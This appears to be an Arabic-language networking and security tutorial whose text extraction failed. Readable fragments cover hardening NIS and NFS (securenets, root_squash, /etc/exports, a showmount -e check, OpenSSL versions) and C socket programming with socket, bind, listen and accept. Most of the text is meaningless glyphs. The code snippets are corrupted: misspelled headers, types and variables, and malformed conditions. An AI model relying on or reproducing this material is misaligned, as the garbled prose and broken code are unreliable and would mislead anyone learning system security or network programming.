, N (,! " ? 59 •
6&
" •
I 5 cracker
"
-,< = G
6& ( #.
"
5
, # 4 (,!
password root
6
0 5 - Y $-,< = G
- Y
NISS
"
I5 •
R4 S @ d *
P
!
, # 4 (,!
( N W
L3
3
I5
("c
•
etc\exports\.
) -, < export
"
! -,6
I 5 showmount e
F•
0
?@
6
R4 S @ : %
4$NIS , # 4
a
" ("c
N 4]? ,
U)
NIS? , 6 U )
)
0_NIS -, 6 U )
-, 6 U )
67
S
2, 0
4 n 9 " ) -,
- Y makedbm
^P
"
? 5 d* •
i
? G 6
TG'Yp-secure
U)
DY/ - .
6I W L3
J)$ DBM 6% ' E ? "
b
1
- 5 S ˆK " ?
6
:
2
3
0
•
C
'
,6 3 v 4$" E
0 5
-"
/var/yp/securenets
4b
6 #P< )
U)
a
%
)
?
+:*:0:0:::z •
password map
4 NFS , # 4
^P
-
-" F etc/exports % ' ? ,
U)
"
6h @ " - Y •
qualified domain names]fully_FQDN ) IP ,!
0_ <
& z •
- Y ypxfrd) ypserv 6
0
NFS ? ,
5!
#
"] G
- Y $ NFSBug (
0, 5
" ?
K
,
,
#4
I5
!
I5 •
#4
7 # l '
0 5
$NFSBug
" ?
'
0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @
% '
:
I 5 etc\exports % '" - Y •
),. T5!
a "
25
? )&' NFS % '
4
U)
mounting "
15G ?
domain (
^
4 ? )&' NFS
6
G5 …
) IP h @ " U
4
home10.20.1.25(secure)a8Q0NFS -,
? )&' ?
^
l '7 B
5!0 S
IP " U4_2< ) ?, 3
0
NFS % '
6" E
rw
)
? 5 export …
ro]("c
, 3 b'
( E etc\export % ' NFS -,
U)
6" E
domain (
./ro)10.20.1.25 homeC
8Q
^
Domain ( ) IPh @ " , G root_squash
superuser $, < -,< TG'l '
NFS -, 6 U )
)
4 #
H$ -,
U)
- Y NFS? ,
0
ID nobody
4 "$ ?# 7
NFS -,
U)
user root S
)
0
…
U)
ID root
)
2, 0
2&N F
, 6 * root )
6% ' u
root_squash/.)10.20.1.25 homeaC
8Q
?
l '7 B
5!0
0
TG'7 4 y
4
% !
4 NIS ) NFS
5 ?,< V8 " ? 59
^P
I 5 T) ' 6
•
n 9" C
”
'
"
)
(_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C
8Q]
U)
)
( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&'
a
67
$U c
$ NIS)NFS ? , 6 U )
N" •
) X
?#
0 <( E " E ? ,
g
0SSH• I 25 % # ) 4
2
NFS" - Y W L3
)
•
("c
0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ?
NIS ? , 6 U )
,
# 4 ) SL
Z
)? ,
^
,1 b
-,< K
6 @
0 F
7 !89 "
checklist UNIX h @ " ?
$=! >
5 SL •
6patch
*
%K
:
$ NIS)
2 3@
? 5 m .1 U#
0 5 - Y security
d *
K6
W L*
deamons
)
("c
N 4
0 5 MR/
, K ) / 9 NIS )NFS -, 6 U )
I 5 0, -,
) "
NIS ) NFS? 5 TG' g•
^
6 )]NFS ) NIS
_?@ )
6U )
?
Layer open secure sockets
(SSl)
? )&'
H
I5 f
^ P
N, #
l 'f #4 " -,
(E
N ,G
#P< n 9 "
- Y
6
open source 7 L ]openSSl
&'( $_
2
K6
-, < 1P 7 !89
j &'
?
^P
, 5
4@ -, 6 U )
SB
g
? 5F 0, 5
"
openldap,cups,maila
I
OpenSSl0 < , 6 3
a 5 - <? @
H$ l ' R 4 S @ ^
N
H F
5
" - Y
0, <
2
,G
e G
5
openSSl
- Y openSSL
,G
$(
*
# 0,
- Y
-
?5F 0(
openSSL
5
& , 5
?
$ openSSL
M, 6"
0,
6
- Y openSSL
6
25F
6
#P
<
I
3 785/
$ :
u 3
3
K
O*
"
H
a, 5
5/ I 5 ],<
openssl " - Y $ 7
I
N&
H M, 6%
- Y openSSl "
4@ -, 6 U )
^ P $hhtps "
0, -
" connectionn
N&
3 <) 2 5 $
0_‹‹s 7 4 )
*
R4 S @ ^
$()
$T)
? G - *1 ,
,, e G
% !
6
F
) openSSL 0.9.7 *
?@ )
U
0 < ,6 3
1 ) U#
HS @2 e G
6
"
$
6
F ?@ " %P
H
R4 S @ d *
,, e G
$,< -,< SL ?@ " % H
I 5 $ openSSl version
" ?
) versipon 0.9.7a *
:
2
0 5 - Y $-,< SL
#
0 < ,6 3
&'(
*
H S @)
- 5< "
R4 SP @ : %
a
4
"
- 5 OpenSSL #
9
*
2 3@
9
% !
%L
0
I5
"2
F
6 &
openSSl -, 6 U )
)
•
?@ ) '
•
) ipfilter" $? # 7
K6
<- Y
Z
, 1 " $,< -,< SL % !
0 5 SL
T 5!
DY/ I 5
2 , ,F ) 2 3@
-,
6@
DY/ - .
$l ' R4 S @ : %
$ openSSL *
- .
:
), .
$,
Q2
gN8 3(
2& &
Socket Programming
K
&F ? G ) ( E % !
Unix % Q
6% !
?
,
u
0 <
F) M :G 2
@
TCP/IP – B
#) 4 "
6‰ 9 b
bP
S L ) K ?@ - 56% !
h
?@
IP)TCP
B
#) 4
SB
F Linux % !
- 4C
c 5G
2
?,
Windows
%
6
"
6N
"@
H8! I R1
6b .
%B
.)
0
N C %Q
@
, 6,
b.
u
,6 * U
) -
?)
-, < = D U
/ 9
<
b.
#
= G
c
•
A 3
)
) W 3 # ) #1
C5
6
2
‰9
6Y
.
, U
BT
6
K6, $n5! ,
GCC F
2< ? "
c
.
K %L'2
,
• ( Y ) #P<
TCP/IP% # ) 4
i
.
e ' , 5 %
<@ #P
< .
H
7
-J) 7 #
G(
0,<
e 'T/
% '
,
2< A) -
0, 5
%L'2
0
b.
4 b.
1Q ) 6
K 2 `56)
) Linux % !
5
63
6C? "
,
, <
0, -,< 5F
,63
PE
.
( Y2
.
(
6
^P
'#< ,P
1
" g@ : %L'2
0,
#P
< .
Y(
H
?@ ( Y ,
(5
I
%L'2
c
,<
6
P"
U#
(5
% !
) ,< \, 6 ) 4 2 -
/
y
?/ 9 b
? F T P) #P
<
0
% '
7
b
B'"
) N4
,
&
(I/O)
6 F) 3 )
,
5 6Y
", -
6U#
5 <, < $,
3 @
T,
• , < -, <
) )\
,
)%
% '
b.
B
5F 2 5< , <
! ( 5 •0 < T, )
7
@
L
N4
#
B
% !
N N)
(E
"
,
T /2 !
)-
7 B
5!
3
,
$2
k
a, 6,
(Read Only)
< b' B'7 L ?@
,
(
_ fopen()
- <? !
% ' L*
% ' , 56
N4
open() 7
% !
&@
_=1
] 0,
' %P
H B
/
"
E
_O
0,
2<
15G 7
0,
?56
, <T
N4
$_ fwrite
%PH B
/ " -,< " % '?)
_ fclose()
? ! ˆ6
0
)
)
("c 2
-, !
2<
close() 7
U
0 ,< ,6 *
B
/ ,
j 5 .Y % '( ,
H
4"
] 0, , P % '
( 5 " U4_
256 < ( E ,
B
15! ) N4
* ? G N4
", -
#
H- Y
0 , 5 T, % '? !
# ), ,
F) 3 )
=B*
a, R
"
6N
B
/
?@ " ?,
3
j 5 .Y
6N
#
U
B
5! ( 5
,6 3 M Y< ) -
)? #
@0
(5
H U#
< b'
B' N4
, 3 b'
, 3
B'T
< )
< )
, 3
< )
7
, 3,
F
,B
B'-
B'U#
I/O \
L % !
a
6
5< $
, 3
B' *
, 3 b'
(con)
I
) )
6- & ,
< )
3
= D) 2
0 < '
2
_z
]% '
C H ,< 'G N4
b '$
6-
write() 15G
k ) ", -
% !
,
)
% '
'
b.
6
' R4
?
…
B' N 4 …
? G j 5 .Y …
B'T
7 4…
)
GH ) % ' …
)
GH ) % ' …
11b3
FIFO =
…
# 2 5< 26• T/
T, ) X ! % H
,
% '
F) 3 |
) )
6 ) ?@ 2 7 !89 1P ) #P< )
) ^P
@
€ , (I/O)
)
) 2 ^P
- N@ 6,
5G
#P< ^ P
a
•^ P •
]
H
'
2
T 5G nP9 7
) -
0,
2
N
g
‰8:
),
?)
"
IP h @
) _d *
,
,
•^ P
socket() 5
˜4
g
- <
- <•
&@
$,
,
$
&@
0,< ,6 3 - Y
- <?
6 ' ^P
' 7
3
,G
I
)
#P
<
6-
,
6-
1P 7 B
5!_z
,
SB
9% !
0, & ,
3 '
1P
( ,H [
1P
7 , ?
1) ) +
_O
?@ "
6-
' %5!
P
(Null) —14
5<
% ', 56 ^ P ,< ( 5
+
7 4h @
5< % !
0, 5
"
6
6 '_d *
%5! ?
read() ] rece()) [ write() ] send() +
_=1
]W 3
,6 3
?56 $%P
H B
/
6
3
% ' - <
0,
% '
" T)
b < ,6* % !
?@ ) W 3
& @
' R4
% ' 3
3
?@ "
•"
N
•" -
62 " U4
) TSAP : ) 2 7 !89 1P " ^ P
)
0 ,<
) )
?
" , /)
% '2,
#P
< .
6 )
$, 3
6^ P 2 "
6 L*
@"
? &56?
B', 56CH
< _% ' - <
]
) < " ) TG'^ P 2 ,
0
(E -
@"
? &56 :
1P
@ " (,
@ 6Y )
0
,
F)
\ )
a ",
P
!
'G
\ ) 2 _0 ,
0 <
-,
N1L
\
6
56 I "
56
1
),
66
6
#5
\
\
6*
N \
]
6
…
0 <
6 Y 2 7) Y $
\
-,
TL ?),
\ ) 2 ( Y2 &5
6
T
A) 0, 6,
' 7 I
2t
5: ) S
N` 6)
2t5:
!
(
6-
2
\
. )
P! ™Y/ , "
$ (FTP) % 'T
%# ) 4 TQ ? G 0,
TCP A) ?56
(SMTP)
# ) #1 6
T
-
\
" C
GP
9) ,
1P 15 /
F) 6-
5>
K6%# ) 4 ) 7 ,3 Q
? FS
! 2 `56) 6
(HTTP) 2
%# ) 4
6:3
? FS
c
6 6-
7 !
UDP ) TCP \ ^ P
0, <
, -,< = G (
…
) j4
)
,
\
,
H I,
0
-
(
7 .Y T
62t
5: ^ P
H
%# ) 4
, "
N56
0,
"
13 ) S
!
) 6
TCP % # ) 4
0
H
) ^ P ˆ6
.
%Q 6
H
"
$ 6-
?,
"
3
A) 2 2 /
0
P CH
B
/
\
#
A)
5> 2
6" 78#
(5
TL
F) 6-
)-
,6 3
,6 3
(8! % !
+ ) >' ,6 3
i:
6-
" - Y
% !
^ P = G"
1P
" UDP
0,
S
6-
0, <
)
$TL
2 5>
L ) ,
0 ,<
&
1P "
\
1P 6-
,
#P
<
6-
P(
DNS
H- Y
TCP 6% # ) 4 " - Y
)
,
), <
1
)
1P :3
0
UDP %# ) 4
?), )
N 56
IP %# ) 4 ) , 5
+H ) ?@ 2 " c
%P
H CGP9 ) -
) 6-
B
# ) 4 TCP ,< - < C
8P
H
6-
<
T
T
!
5<
/
UDP
3
!& ( Y
3% 5 C
85!
= G U
TCP %# ) 4 7 K
&F ?,<
E $^ P
H
F
?),
"
| -, 6 U )
( Y
G ,<
'9 )
9P
\) < I.1
"
6
F % H
^ P 2 ' 9 R 1$ <
# ^P
6
^P 2
0, < -
0
%
,6 3
= G
(8! % !
š7
^P 2
6-
<
#P
<
) 4) 2
6-
M 9)
R4 ?#
# 2
^P C
85!
1P
3% 5
YB^ P -,
\) < $2 '9
1P $^ P A R4 7
C, ! H
•
•
0 ' ,6 3 (
•-, 6 U )
0
^ P -,
•_-
\) <
?@ I ) ]
a
0
2
7 !89
% 5 )
@) ),
SB
9
, , "
R4
R4
5! = G
) 4 Client
c
C
) 4 Server -, 6 U )
3
!89
, /) $ X
task , 5
I
)
RN V <
7 !89
0,6, % .
I $-
7 P!
I T /2 !
-
)-
?
)
3
F
3
O) -, 6 U )
O) 7 .Y S1H
) )- 5
<
SL -, 6 U )
?@ A"
-,
4 " U4 )-
2<
'
\) < -, 6 U )
H) TQ ? G
!89
7 .Y 2 "
0, 5 T
)
" 2*
X
X
2
)
5
v 4
("c
-, 6 U )
^P
H
B 1/
2
P
5
X
, 5 T
I
S
v 4$X
0
7 !89
3
$"
) ,< ,G ,
2<
;.
,
)
-,< +"
6
5
6
/ 7) Y
<
)
N] 0
6
^P
%
M 9
,G 0,
6-, 6 U )
,G C
c 5G 2# 1
_0,
) N* 4 $7 !89 S/
,
*
H
-,
,
T
I
Y
, N I
N M 9
–
…-, 6 U )
5 –, 5 T
* 4)j
N
;.
5 …
4
B
F TQ
T
\X
I
:
-, 6 U )
0
5
3
,6 3 7) Y $ <
%
$
a
% !
b'
\ % !
% !
,
b.
F $
0,
+ b
(5
2 0, 6,
,
-,
6^ P
?
6X
A R4
I
' % <+
6-
) >' ,
TCP ^ P
Q ,/ ,
6X
4
E
"
< A)
2 G Q ,/ ? G % !
,<
( E bind()
) TCP
TCP
5
6
6
$
"
5
,<
,G B
/
_z
2 0, 5 \) < TCP
,< ,G ^ P
A R 4 (8!
,
'
F
)T
) -, < ' R4 ? &56
, "
U#
_O
<
(8! % !
b
^P
^P
,6 5<
( E listen()
G
)
" - Y -, 6 U )
,
3
+ b
( UDP
4 - 5< UDP
A
(8!
"
/
4h @
, 3
, -
0,
,G 2 G C
c 5G 0,
< A"
TCP )
<
)
A R4
TCP 7 9P
-
/
&1bind()
2#5 ?
3
2
_=1
= G, "
4h @
7
5<
L*
2
'G W 3 7
,G
#B
3
H ] 0, _0
^P
P 7
5
5
( E Socket() 5
- 5 < ? <,L
R4 ? G
<
^P
(8! % !
: 5< I
-, 6 U )
'G ( UDP
2 0, K5
) # @ " %P
H
2 `56) -, 6 U )
"7 B
5!
0 <
5
1
5
0, )
( Y
F T/
›
(E
B
/ 2 56
|-, 6 U )
5
,6 3 , "
E
,!
F
N1
a K5
,
5
6X
H 0, N
("c
>'
:,
,G 2 ,
1
)$
5<
0
7) Y ^ P 2 ,
T G') " 7
,
L
L
$? &567 L ,
7) Y
B' , G
"
<
-, 6 U )
)
2,
)@
6"
7) Y ^ P 2,
Q ,/ ,G % '
0 < " ? &56 : 5<
? G 0,<
b
,
<
]
nB
G 7 9P "
,
X
" accept() + - Y
% !
Y D 7 # accept() + 0,
% >Y
'G 5<
C
_
_ F) 7
0,< ,6 3
0, K5 - Y
0
,6 3
5
recv ) send 7
1P
R4 ?# A) )
2 0, 6, 5 3
_ close() + b
] '
_ shutdown() + b
] '
)T
_-
^P C
_)
'9 ) ^ P +:H …
7 B
5! "
# ':# +:H …
a < T5!
% !
b' E
0, )
F $
^P
0,
P 7 4h @
3
U)
^P
-, 6 U )
H
, 56
-,< (8!
("c ,G B
/
,
F) bind()
" - Y
X
A 3 #B$
? N " ^P
connect() 5
?@ 5
_=1
6^ P = G , "
-, 6 U )
5
L*
_O
)&1 G , 6,
+ " - Y
X
X
I
?@ , ,< -, 6
0,
TCP ^ P
0
H
9P 2
TCP 7 9P
5
_ Hand Shaking]
B
/
( E ) \) < 1 C
85! connect()
R4
<
2
M 9
1
),<
0
( , H 6-
H
'
)T
'
G
'X
$
&@
ˆ 6?), ,
%/
$, <
" bind() + "
- Y
,6 * ("c
TCP ^ P
#
^ P -,
Y
<
,
93
C,E
3 7 4 - 5<
\) <
' connect() %5!
)
-, 6 U )
0, 5
0, 5 ( ,H 60, 5 +:H '9
'9 ) 7
'
T
shutdown()
send() ) recv() +
close() +
" _z
^P _
?@
H)
5
-, 6 U )
"
5
6
1) ) +
B
2 `56) 60 6,
("c ?5 3
6C
_0 ,
^P
\
6,
\F
u $ "= G
`56)
?@
-
N
G
H
) i.
H
6-
" g@
•
L* •$-
N
\ 21
)
)
H- Y
a,<
L*
$^ P
= G C
8G'0
?5 3
.$
,!
`
-,
2
$% ' - < , 56
) 47 4h @
3
?@
G:H ( 5 ] 0
?5 3
"
6 u
" U4
H
P
"
N1
H
-
"
,
A
Int
A;
\ 2 )
^ P M 9 2 < IPh @
3
a "7
Struct Sokaddr {
Unigned Shortsa_family ; /*address family AF_xxxx*/
Char sa_data[14] ;
/*14 bytes of protocol address*/
};
2 G
& 2
/
R 1œ ' , 6 3
\ ,
6 #P<
d*
B
#) 4
)
TCP/IP % # ) 4
N
0,
#P< ;.
6
$
IP h @ $7
) 7) Y
0
< 5 -,6
! 5E
5
2G
[
3
-
3
& 2 Appletalk %Q
,6 3 7) Y
4h @"
,
B
#) 4
8G'0,
C
AF_INET
0
N
I
%L'2 %
d*
3 a sa-family …
-
) ) ) #P<
7) Y
0
\
2 a sa-data …
-
6, B'2
c
=
G
1
)
)
)Y = G 1
)
B
PH #
T G CH
a, N -
<
- *1 ( ,
Struct sockaddr_in {
'G `
6" ,
5<
/*address family*/
Shortint_family ;
Unsigned shortintsin_port ; /*port number*/
Structin addrsin_addr;
/*internet address*/
Unsigned charsin_zero[8];
/*same size as struct
Sockadda*/
#P<
),
2 G
-
3
d*
#
I
)
8! ?), $i.
d*
,! C
8
, 56a Sin_port …
[ ,
) ,B'2 a Sin_port …
) 47 4h @$
A 3 ,B'2 0,
%
3
< AF_INET
0,<
0, 5
B
P
H
2 < IP h @ a In_addr …
I
, , b '$, < , 6 3 = G
0
Y
,
,
B
#) 4
8
C
,
6 #P< ( 5
<= G
,
( Y
l'#
IP h @ C
8G'
h @ T 9 6 #P< "
-
62 a Sin_zero [†] …
6
?@ $,B'2
2
#P
<
N
#P
<
Y C 5 memset() % Q G 9
F) % 1 0, <
) -,< - Y T G 7
0,< - Y % H #P
<
3
1/
6
`
,
C5 / 1
)
0
<
$7) Y
B
#) 4(5
) 7 4h @
"
N62
'X
0
62 ,
0 <
" (,
6$+
3 ' ?
= G " - Y \ 5E
) , T G CH
1
)
N
B
P
H `
F •\ n : •
0
?@
3
-,< = G in_addr (
N
)
#
()
,6 3
, 5
H
#
@
/ ()
#
= G
0
"7
/*Internet IP address (a strcture for historical reason)*/
Struction_addr {
Usigned longs_addr ;
l '7
IP h @
?@ = G )
?@
9
0
2# 1) ,
B
P
H #
T/ 6
- Y
<)
5< - *1
I'/
5<
,6 3 6
a <
F
- 3• 3
2
1
6,/) S
< SL
"
LE \ "
<
6 ,
-
m.1"
G
< 78#
_-
< 7) Y <R
-,< n' DE 7
H) R1
S E! 5
6, B'
F)
LE \ ) BE \
H
#P
< )
c
,
,< - < )
, B'2
'G unsigned long
6" ,
7 5B "
I
1
)
0,< , 6 3 'G
)
%
$,
-, < = G c 7
%# ) 4
N
TCP/IP
S
LE
)
3
<
H) TQ ? !
0
3
Struct sockaddr_inas ;
As.sine_port=0 xb459 ;
" U4 R1
H A"
I _- P< CG:H )]
4
?@ " ,G )
<
- 3•T) A"
7 4 h @ TCP
"7
?
) 2 2'
H
a,< ,6 3
B4
59
)
+
, 6,
H
6, B'?)
,
'G % 1 2 56 0,<
a
S
) X
U
htons() a BE 1/
htonl() a BE 1/
ntohl() a 2 <
H) 2
) 2< \ ? N
#P
<U
ntohs() a 2 <
H
B
G' 1/ BE "
B
G' 1/ BE "
& ? !
"
) 7 5B % ,P +
7 5B % ,P +
) 7 5B % ,P +
7 5B % ,P +
, ,
A
SL
"
)
F- Y
6, B'
2<
?
3
("c U
LE 7
H " %PH C
5 /?
0, - Y l '+
IP
TCP
,
I
,B'C
<
- Y l '+
sin_family , B' sock_addr_in `
-, < = G % !
l '+
"
<@ l '+
,B'2 )
"
H) b'a R
T Q? !
< I
H
("c , B'2
6
,
- Y
<
6 3
[
AF_INET
,
R 1$, < ,6 * %
1Q
#P
< ) )
0
5 - Y
a
6, B'
IP
S1H
@
<
h @ ,B'?)
IP h @ I 78#
,
IP
•2
6h @ ;.P
a, <
<
6-
pwwžwwžw‹qžw{p
,! IP h @ ,B' sock_addr_in `
IP
3
@O L
F "+ ) 2
1/
4 long \ " ,!
<
a
‹‹žwwžwpwžw†} ( '
, B' BE S1H
<
,!
% ,P
R1l '
+ 2 a inet_addro() + …
U4 )
< h @ c TQ
0
h @
7
L
G ,6
B
P
H + % 5! U#! + 2 ainet_ntoa() + …
(E
IP h @
<
) struct in_addr \ " l '+
H 9
7 L
) )
4 0, 5
a " TQ
BE S1H
@) '
% ,P $0
= G
:
< \ ?@ F) 3
printf (%s , inet_noet_ntoa (ina.sin_addr) ) ;
k
F) 3 ) -
G
)
:
< 7 L h @
a
"( '
. l 'TQ
F) 3 C
8Q 0,< ,6 3
wqžŠžw‹wžwsq
IP h @
www.ibm.com ( ' -" /
)=
("c +
G
,
?@ " % P
H0
@ % ,P N N
@
*
6 3iX
b.
0, < = G ^ P
_ TCP
P] -, 6 U )
H
- Y
+
Socket() +
a
"7
+
B( '
#include <sys/type.h>
#include <sys/socket.h>
intsocket ( intdomain,int type,int protocol ) ;
- <C
8PH
.
I AF_inet
0 <
\ ,
,
,
,
(8!
Type , B'
?@
,
3 -, 6 ?
[ ,
$
? 6 *1
#P
<U
\
\
0,< (
\ "
H sock_stream
) 6,
I
? I
%# ) 4
0
#P< .
,6
56
H(
#P< 6
) T)
6, B'
0
–, G +
?@ "
"
R 1_% '
,
0
Ÿ
+ 2
N
<- Y ,
,N
H
,
F) 3 C5 / , YD U
+ 256 F) 3
:3 - 5 < error
"
? G 5 <)
,< , 6 3 'G
+
,
,
+
:3 - 5< A"
<
7 B
5!
u ,< …w , socket() +
Perror() 5
56
5 3^P
' %5! ,< …w socket() +
, ) ) - P& @
,
[
- < % Q C H ] ,< ,6 3 - Y
0 <
=H
,6 3
?56socket() + b
L*
L*
a Protocol …
< - 5< ,B'2
Y ?@ ,
[
I Sock_DGRAM
0,
,
,<
a type …
42
\ ? 6 *1
3(
4 2 a domain …
6
,
4
0,<
H)
-
5
)
, = G
"
+ )
u ) 2 0
-, @ 1Q
?@
# A)
0,
6
a Bind() +
^P
y
b'5<
bind() + 0
h @?
-,
P
0, 5
6
a,
H
(5
,
,6
- 5< , <
"-
0, 5
= G
5
c 5G
C
•-,< "
7 4
(
c 5 / = G2
C
U4
" Bind() + n 9 "
W 3 7 4 - 5< ^ P
http %# ) 4
TCP
)
A"
H)
ˆ 6" 6 1
), -
j6 3 % !
†q 7 4
B
. 2<
% !
G -, 6 U )
5
A
5<
1P
B
5!• ,
,6 5<
G2
"
( E 6-
F
) UDP TCP
/
<
6
4)
6X
Y
2 `56
H) TQ ? G
( 5 $-, 6 U )
% .$
†q
@ ,L
" 7 L bind() +
a
7 4
B( '
#include<svs/type.h>
#include<svs/sock.h>
int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen )
0, -
" socket_] + " - Y
0, 6,
B
.
P " h @
L*
-,< "
5< , 6 3
< IPh @ ) 7 4 h @ $
-
3
% !
@)-
- N@
O*
0
S /
=:1"
13
@
< I
Y
' L - 5<
My_Addr `
- <
,
7
$ •ŠŠsŠ
5<
F)
4 h @ , B'
2
3
0
3
T 9 a Addr_len …
# Bind_] +
U#
wqp‹ - 5< " 7 4
0,
/
a My_Addr …
`
0,< = G C
8P
H `
a
?56a sockfd …
8P
C
H
I
b . _= 1
@2
- 5< ? !
2
, < wqps
-, < ) "
#
Y 2
6-, 6 U )
0
,6 * ?
?@
)z *
)
4 , P 5<
,
_O
6-, 6 U )
6
I INADDR_ANY
$,
, &
4 - 5<
4 2 " -" F % !
IP h @ , B'
[ ,
IP h @
5< B
. 2<
)
U#
37
b.
% !
0
c
6, B' 6
?@ ,
% ,P BE 1/
1/
Y
,
1/ ) ,
Y
N-
3 ?@
?@ HTONS_] +
, )
6a
-
) "
3
5 <" % P
H
"
' Bind_] % 5! - N@ , < u $ :3 \ A"
0,
4
,
#
("c
2
"
4 5<
?@
5<
G
, % ,P
3
,6 3 "
H
#_
O*
Bind_]
0
,6 3
-
?@ % 1 0,<
N
- N@
2#5
0
-
_z
…w ,
_-
G ,<
) - P& @
PEAAOR_] + ) :3 - 5< Errno
:3 7 L*
a Listen_]+
(8! -
^P
% !
+ 2 b
TCP ^ P
6X
0
),
7 P!
_+
N I )-
=
I.1 $-, 6 U )
, 6, 7
4h @
+ b
0,6,
G] , G
? I
R
H 6U)
) " ) T G'7 9P
@"
=
a
"7
% !
,
(8!
) -
<
7 4 - 5<
H
X
,
Q ,/
@)- 5
,G Q,/
6X
I.12 "
", - " U4
TCP ^ P
@^P )$
b'+ 2
TCP ^ P
0
F? "
2,
A)
G -, 6 U )
2#5
? " 6 9
F
7) Y
) 4
, , ,
% !
2
H
B
/
#
< (8! % !
+
#@
,
Listen_]
B ( '0,< W 3 7 4 - 5<
Int listen (int sockfd , int back log ) ;
0, -
E
?@ ,
L*
?56a Sockfd …
5
"
0 I -, < =
0
erno u )
,G Q ,/ a Backlog …
) nB
G 7 9P
, 6 3 …w+ 2
,
backlog ,
-,< ),. pq
:3 ")
7
B
P
H+
0,<
- ,3
, 56
:3 - 5<
Accept +
a < H ?@ ( Y
-
<
)
_] +
) 4 TCP ^ P
6
H) 0 <
2 "
,
M 9
7 B
5!
, PB
:
+ b
% !
>/
/
@)L*
T)
L*
F accept
accept()
0,<
0,6,
% 1 2 56 ,6, ( E
5< E
()
L*
nB
G 7 9P "
I
-,< =
- Y nB
G 7 9P "
7 9P %
-,< =
("c
0,
, accept()
) -, @
2 7) Y 0
# A R4
T)
L*
2
) 7 !89 T
0,<
6X
2
€
- Y
] )
# -,< =
, ,F
accept() +
, " U4
<
O*
% !
0,
, + 2
$ ' R4 _ F) 7
# nB
G 7 9P 2 " ,
, ,F
5<
"
,< F listen_] +
X
" 5<
) 4 7 L*
@)-
I
< - N nB
G ) -,< =
X
% .%
),
)
'
7 9P "
" _=1
/
()
" _O
# L*
a
0,
2 0,
"7
+
B( '
#include <sys/socket.h>
int accept ( int sockfd , void*addr , *addrlen ) ;
0
T
Socket _] +
-, @
+ 2
M 9 IP h @ ) 7
4? !
2
L*
@ 5<
4 h @ nB
G^P
0,< 'G C
8P
H #
,
3
- < a Addr …
`
A R4 " U4 % !
0,
5<
S / addr
a Sockfd …
?@
`
,
^P %
T 9 a Addrlen …
H- Y
u
,G
1)
:3 ?@ - 5 <
a
L*
-
Ÿ
+ 2
,
:3 , < _…w]
,
0
% H errno
,6 3 ,
B ?,< 2<)
0
"(5
TQ
#include <string.h>
include <sys/type.h>
#include <sys/type.h>
#Define Myport 3490 /* the port user will be connecting to */
# define BACKLOG 10/*how many pending connections will hold*/
main()
{
int sockfd, new_fd;/* listen on sock_fd, new connection on new_fd*/
struct sockaddr_in my_addr;/* connector’s address information*/
if (( sockdf=socket(AF_INET,SOCK_STREAM,.)!= NULL){
my_addr.sin_family=AF_INET;/*host byte order*/
my_addr.sin_addr.s_addr= INADDR_ANY;/*auto-fill with my IP*/
bzero (&(my_addr.sin_zero),8) /*zero the, rest of the struct*/
if
(bind
(sockfd,(struct
sockaddr*)&my_addr,
sizeof
(struct
sockaddr))!=1-){
listen (sockfd, BACKLOG);
sin_size=sizeof (struct sockaddr_in);
new_fd= accept (sockfd, & their_ addr,&sin_size);
, ,F
"
60,
'
- Y $
T
,
N
accept()+ b
N
?@ L *
recv()) send() +
)-
- Y % H
5
a
) -, 6 U )
"7
+ )
5
+ ) 2
B ( '0,
6-
1P
Int Send (int sock fd, const void_msg, int len, int flags);
Int recv(int sockfd,void_buf, int len, unsigned int flags);
0
-,< z *
E@ "
accept() + "
-, @
1
60, <
_ `
T
0
Y ?@
b' 6
B
. a Msg …
@ %Q] I'/
H TCP
) '
S /
'
2
;.
5 iX
a Sockfd …
L*
" -
1
,B'?)
)
T 9 a Len …
6-
a Flag …
, `4 " & 6 4
0, RN
'
6-
B
. h @ recv() +
I'/
0
7
1
)
0,
, 6 3 …w :3
d*
X
S /
len
u
6")
'
,G
-,
"
) '
7
1
'
4 2 a Buf …
H E@
+ ) 2
6
,
,G $ PQ ,!
1
,G
2#5
,
H
0,<P? # , +
,
H wqqq , len
1
), -
] 1
6-
%
"
†qq 7
0, d *
5< ,
2
@=B
# ,
send() + b
T /, # T
u
6-
e 'TQ ? !
0, < pqq
5<
-,
-,
E/ ,
H _ '
G B
/
6 a
0,<
\
? 6-
6
)
A /)
b 'recv() ) send() + a #
' )T
) UDP A)
(
B
, 63
1
)
œ,
P
, ,
T
shutdown()) close() +
, 5
'
T
-
0, , P
) < N"
^P ,
^P
,< M 9 ? "
,
, < "
"
? " 6 B', 562# 1
)
a
close()+
"7
B( '
close (int sockfd) ;
+
L*
+ b
,<
? 56
sockdf
L*
0,< ,6 3
- Y % H
'
2 0 I
&
)T
a Socfd …
L*
,
H 0
accept()
-,
socket()
I ) nB
G 7 9P ( 5
N
close() + b
<
9P
0
% !
7 9P =
a
TCP 7 9P "
),
A"
4
$-
#
TP
H
/
,,P
N ^P
-
X
6
?@
F ,
0,
'X nB
G
?@ B ( ' ,<P shutdown() +
"7
,6 *
2
N -
Int shutdown (int sockdf, int how);
0 I
a
" ? `56$-
R4
" ,
T
1
) "
0,
6-
"@
'
"@
8
C
g
-
' a Y
) ) '% !
2#5
g
-
2#5
g
'
, 6 3 …w +
2
,
0,
_TCP %# ) 4
.
a,
-, 6 U )
H- Y
5
,
G
A"
:3 ")
4
0
aw , …
0
" ? `56
)T
ap , …
%5! close() +
0, 5
u )
, …
T
F) 3 ' % !
-
A) a How …
2
^
"
^
, 56 1/ 2 0 <
#
2#5
?@
1/
0,
"
a Sockfd …
L*
7
B
P
H+
, 56
:3 - 5< errno
P]
- Y
4+
, , < 'G
5
P,
+
G
T/ 0, <
E
- Y
+ "
#
0, )
+ 2
F)
-, 6 U )
) Yˆ 6 E
0,
Y -, 6 U )
<
5
connect() + b
(E
,
F)
5
- Y
6-
^P
H
%5! 2
< ' R4 X
'
0, , Pshutdown ()
socked_]
X
-, 6 U )
C
5
"
2
0,< ,6 3 0,
CH , _=1
- Y ,< 'G B
P
H j*
0
?@ ) ,
,
( N6
_O
, < I
,H
iX
recv() ) send() +
)T
close () + b
5
" _z
-,< E ^ P C
_
connect +
)
<
listen () +
0
connect () + " -, 6 U )
- Y
) ,< -,< F I
,6 3 & @
' +
2<
^P
) -, 6 U )
E - N@ , < -,<
a
H
accept () )
3 '
connect () +
"7
B( '
#include <sys/types.h>
#include <sys/socket.h>
int connect (int socket, struct sockadr* serv_ addr, int addrleny);
0
